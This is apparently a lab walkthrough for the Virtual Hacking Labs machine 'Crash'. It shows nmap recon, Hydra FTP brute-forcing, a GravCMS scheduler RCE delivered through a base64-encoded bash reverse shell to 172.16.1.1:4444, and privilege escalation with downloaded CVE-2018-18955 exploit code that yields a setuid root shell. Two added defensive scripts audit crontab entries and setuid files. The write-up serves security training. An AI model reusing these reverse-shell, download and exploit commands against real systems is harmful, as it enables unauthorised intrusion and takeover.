
VHL — Crash

GravCMS on Ubuntu. Unauthenticated scheduler RCE CVE allows arbitrary command execution as the web user, then sudo privesc.

February 12, 2025 · Virtual Hacking Labs · Web · Easy · Linux

#GravCMS · #Scheduler RCE · #CVE · #Sudo

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 19:32 EST
Nmap scan report for 10.11.1.63
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:4a:9c:ee:63:f4:5c:ec:4e:aa:cb:aa:fd:7d:21:b2 (RSA)
|   256 9c:cc:be:88:3c:c5:96:9d:37:0a:02:9b:bc:60:81:f1 (ECDSA)
|_  256 64:48:b9:34:95:af:b9:7d:a9:83:c0:1c:71:08:d1:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Grav
| http-robots.txt: 8 disallowed entries 
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/ 
|_/user/
|_http-generator: GravCMS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   21.55 ms 10.11.1.63
```

21 (FTP)

```sh
21/tcp open  ftp     vsftpd 3.0.3
```

```sh
ftp anonymous@10.11.1.63
Connected to 10.11.1.63.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
```

```sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.63
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-12 19:34:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.63:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-12 19:34:50
```

80 (HTTP)

```sh
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Grav
| http-robots.txt: 8 disallowed entries 
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/ 
|_/user/
|_http-generator: GravCMS
|_http-server-header: Apache/2.4.29 (Ubuntu)
```

```sh
echo -ne "bash -i >& /dev/tcp/172.16.1.1/4444 0>&1" | base64 -w0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xLzQ0NDQgMD4mMQ==
```

  • Modify the code in the highlighted red area.

```sh
nc -lnvp 4444
```

```sh
python3 gravcms.py 
```

```sh
nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.63] 58622
bash: cannot set terminal process group (1738): Inappropriate ioctl for device
bash: no job control in this shell
webuser@crash:/var/www/html$ whoami
whoami
webuser
```

priv esc

linpeas

```sh
╔══════════╣ Operative system
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.15.0-29-generic (buildd@lgw01-amd64-057) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.1 LTS
Release:	18.04
Codename:	bionic

╔══════════╣ Sudo version
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.21p2
```

```sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/15 * * * * root logrotate /etc/logrotate.conf
* * * * * cd /var/www/html;/usr/bin/php7.4 bin/grav scheduler 1>> /dev/null 2>&1
```
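The crontab dump above is worth more than a glance: the Grav scheduler entry runs every minute out of the web root and discards all of its output, and unlike the other entries it has no user column. As an added example (not from the writeup), this script audits system-crontab lines for exactly those properties. The sample crontab is constructed from the lines shown above, and the set of web-writable directories is an assumption standing in for a real `os.stat()`-based check.

```python
"""Audit /etc/crontab-style entries for jobs that run out of a directory a
lower-privileged account can write to, or that are malformed.

Added example, not part of the original writeup. SAMPLE_CRONTAB is constructed
from the linpeas output in the writeup; WEB_WRITABLE is an assumption.
"""
import re
from dataclasses import dataclass

# Constructed sample: the system crontab as dumped by linpeas in the writeup.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/15 * * * * root logrotate /etc/logrotate.conf
* * * * * cd /var/www/html;/usr/bin/php7.4 bin/grav scheduler 1>> /dev/null 2>&1
"""

# Assumption: directories the web user can write to. In a real audit derive
# this from os.stat() and the account's uid/gid instead of hard-coding it.
WEB_WRITABLE = {"/var/www/html"}

# Five schedule fields, then the user column, then the command (system crontab format).
SCHEDULE_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.*)$")


@dataclass
class CronFinding:
    line: str
    user: str
    command: str
    issues: list


def parse_entry(line):
    """Split a system-crontab line into (schedule, user, command), or None."""
    m = SCHEDULE_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3)


def audit_crontab(text, writable_dirs=WEB_WRITABLE):
    """Return a CronFinding for every entry that has at least one issue."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parsed = parse_entry(line)
        if parsed is None:
            continue
        _, user, command = parsed
        issues = []
        # In system-crontab format a sixth column is the user. If that column
        # holds a shell builtin or a path, the entry is missing its user field.
        if user in ("cd", "sh", "bash") or user.startswith("/"):
            issues.append("missing user field")
        # A job that cd's into or executes from a web-writable path lets whoever
        # controls that directory influence what runs under the job's privileges.
        for d in writable_dirs:
            if d in command:
                issues.append(f"runs from web-writable path {d}")
        # Fully silenced output hides failures (and tampering) from the operator.
        if "/dev/null" in command and "2>&1" in command:
            issues.append("output fully discarded")
        if issues:
            findings.append(CronFinding(line, user, command, issues))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f.line)
        for issue in f.issues:
            print("   -", issue)
```

On the sample input only the Grav scheduler line is reported, with all three issues. The remediation the check points at is the usual one for CMS schedulers: run the job as the web user rather than as a privileged account, keep the web root unwritable by the account that runs it, and log the job's output somewhere an operator will see it.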
```sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                                   4:7.4.0-1ubuntu2.3                          amd64        GNU C++ compiler
ii  g++-7                                 7.5.0-3ubuntu1~18.04                        amd64        GNU C++ compiler
ii  gcc                                   4:7.4.0-1ubuntu2.3                          amd64        GNU C compiler
ii  gcc-7                                 7.5.0-3ubuntu1~18.04                        amd64        GNU C compiler
/usr/bin/gcc
```

```sh
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 143K Nov 30  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
```

```sh
webuser@crash:~$ ntfs-3g --version
ntfs-3g --version
ntfs-3g 2017.3.23 integrated FUSE 28
```

  • https://www.exploit-db.com/exploits/41356

```sh
mv /home/sake/Downloads/41356.zip ./
```

```sh
webuser@crash:~$ wget http://172.16.1.1/41356.zip
```

```sh
webuser@crash:~$ unzip 41356.zip -d ./
```

```sh
webuser@crash:~/41356/ntfs-3g-modprobe-unsafe$ ls
ls
compile.sh  Makefile  rootmod.c  rootshell.c  sploit.c

webuser@crash:~/41356/ntfs-3g-modprobe-unsafe$ chmod +x compile.sh
```

linux exploit suggester

```sh
webuser@crash:~$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
```

CVE-2018-18955 subuid_shell

```sh
mv /home/sake/Downloads/CVE-2018-18955-main.zip ./
```

```sh
webuser@crash:~$ wget http://172.16.1.1/CVE-2018-18955-main.zip
```

```sh
webuser@crash:~$ unzip CVE-2018-18955-main.zip -d ./
```

```sh
webuser@crash:~/CVE-2018-18955-main$ ./exploit.dbus.sh
```

```sh
webuser@crash:~/CVE-2018-18955-main$ chmod +x exploit.dbus.sh
chmod +x exploit.dbus.sh
webuser@crash:~/CVE-2018-18955-main$ ./exploit.dbus.sh
./exploit.dbus.sh
[*] Compiling...
[*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service...
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 231072
[.] subgid: 231072
[~] done, mapped subordinate ids
[.] executing subshell
[*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf...
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 231072
[.] subgid: 231072
[~] done, mapped subordinate ids
[.] executing subshell
[*] Launching dbus service...
Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
[+] Success:
-rwsrwxr-x 1 root root 8392 Feb 13 03:09 /tmp/sh
[*] Cleaning up...
[*] Launching root shell: /tmp/sh
whoami
root
cat /root/key.txt
f0avo5t53k9nnfg566zj
date
Thu Feb 13 03:10:00 CET 2025
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
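Both setuid findings on this box, the `/bin/ntfs-3g` that linpeas lists and the `/tmp/sh` the exploit leaves behind, show up in plain `ls -l` output, and the second one is the kind of artifact a host check should catch on its own: a setuid-root binary in a temp directory that is also group-writable. As an added example (not from the writeup), this script parses `ls -l`-style lines and flags setuid files by placement and permission bits. The listing is constructed from the two lines shown on this page plus one benign line; the temp-directory list is an assumption.

```python
"""Flag suspicious setuid binaries from `ls -l`-style listings.

Added example, not part of the original writeup. SAMPLE_LISTING is constructed
from the two setuid files shown in the writeup plus one benign entry;
TEMP_DIRS is an assumption about where no setuid-root binary should live.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the linpeas SUID line (trailing hint included) and the
# file the exploit run reported, plus a normal non-setuid binary as a control.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 143K Nov 30  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsrwxr-x 1 root root 8392 Feb 13 03:09 /tmp/sh
-rwxr-xr-x 1 root root 3100 Jan  1  2024 /usr/bin/example
"""

# Assumption: locations where no legitimate setuid-root binary should live.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# mode, link count, owner, group, size, month, day, time-or-year, path
LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)"
)


@dataclass
class SuidFinding:
    path: str
    mode: str
    owner: str
    reasons: list = field(default_factory=list)


def parse_ls_line(line):
    """Return the mode/owner/group/path fields of an `ls -l` line, or None."""
    m = LS_RE.match(line.strip())
    return m.groupdict() if m else None


def check_setuid(listing):
    """Return a SuidFinding for each setuid entry with a placement or
    permission problem. Entries that are not setuid are ignored."""
    findings = []
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if not entry:
            continue
        mode, path, owner = entry["mode"], entry["path"], entry["owner"]
        if mode[3] not in "sS":       # owner-execute slot carries the setuid bit
            continue
        reasons = []
        if owner == "root" and path.startswith(TEMP_DIRS):
            reasons.append("setuid-root binary in a temp directory")
        if mode[5] == "w":            # group-write slot
            reasons.append("group-writable setuid binary")
        if mode[8] == "w":            # other-write slot
            reasons.append("world-writable setuid binary")
        if reasons:
            findings.append(SuidFinding(path, mode, owner, reasons))
    return findings


if __name__ == "__main__":
    for f in check_setuid(SAMPLE_LISTING):
        print(f"{f.mode} {f.owner} {f.path}: {', '.join(f.reasons)}")
```

On the sample input only `/tmp/sh` is reported, for both its location and its group-writable bit. `/bin/ntfs-3g` passes this check because its placement and bits are normal; catching that one requires comparing the installed package version against the advisory, which is a separate, version-aware check. A cron job that runs this over `find / -perm -4000 -type f -exec ls -l {} +` and diffs the result against a known-good baseline is the usual way to turn it into an alert.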